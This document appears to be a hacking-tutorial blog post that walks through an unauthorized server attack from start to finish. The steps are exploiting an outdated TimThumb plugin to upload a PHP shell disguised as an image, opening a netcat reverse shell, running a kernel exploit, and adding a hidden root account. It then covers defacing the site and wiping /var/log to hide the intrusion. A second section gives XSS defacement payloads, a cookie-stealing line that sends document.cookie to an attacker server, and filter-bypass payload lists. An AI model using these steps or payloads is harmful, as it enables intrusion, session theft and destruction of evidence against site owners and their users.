How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

– Backtrack (Backtrack Website)
– Firefox (get it from here….) – Included in Backtrack and Ubuntu
– Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
– iCon2PHP (Get it from here….)
– A good shell (iCon2PHP Archive includes three great shells)
– A good VPN or Tor (More explanation below…..)
– Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack
— Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
— Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
— Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
— iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
— While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
— Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.

____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

– – –  Before we begin  – – –

-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking here…
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.

The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)

OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.

iCon2PHP Terminal Output:
[…]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[…]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.

What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…

Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:

netcat

4. Now type:

-l -n -v -p 402

5.It should have an output like this:

listening on [any] 402 port

6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:

Host:YouIPAddress Port: 402 (or the port you forwarded….)

8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:

whoami

you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:

— The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
— Change the permissions of the exploit:
chmod 777 exploit

5. Execute the exploit. Type:

./exploit

6. Root permissions acquired! Type this to ensure:

id

or

whoami

7. Add a new root user:

adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username

8. Change the password of the new root user:

passwd root1

SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).

Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:

/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files

In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:

su root1
rm -rf /var/log
mkdir /var/log

Pyloris Application Layer DOS ATTACK Tool

Pyloris is an inspired python implitmentation of slowloris tool which was written in Perl.
PyLoris is a scriptable tool for testing a server's vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

Download Pyloris

Hacking Website with XSS Vulnerability

'XSS' also known as 'CSS' - Cross Site Scripting

 It is a very common vulnerability
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply "phishing" on falls users.
This technique is also used for website Hacking.

Types of XSS:
There are actually three types of Cross-Site Scripting, commonly named as:

1. DOM-Based XSS
2. Non-persistent XSS
3. Persistent XSS
   
   
   DOM-Based: The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
- The attacker creates a well builded malicious website
- The ingenuous user opens that site
- The user has a vulnerable page on his machine
- The attacker's website sends commands to the vulnerable HTML page
- The vulnerable local page execute that commands with the user's privileges
on that machine.
- The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses
that kind of tool to leave messages to the owned
of the website and at a first look it doesn't seems something dangerous, but if an
attacker discover that the system is vulnerable can insert some malicious code in his
message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any
check on the content of the inserted message: it just inserts the data provided from
the user into the result page. 

How to Find XSS Vulnerabilities ?

To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

How to Deface a Website using XSS ?

Well now you understand how XSS works, we can explain some simple XSS deface
methods, there are many ways for defacing i will mention some of the best and most used,
the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website.
Mine purpose is to make you understand the concept. 

How to Cookie Stealing using XSS ?

 

I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here: 

How To Make A Cookie Stealer Php script ? 

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do. ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

How to Bypass Filtration ?

 Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

')alert('xss');
or
");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>

Advanced XSS - way to bypass magic quotes filtration:

 Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>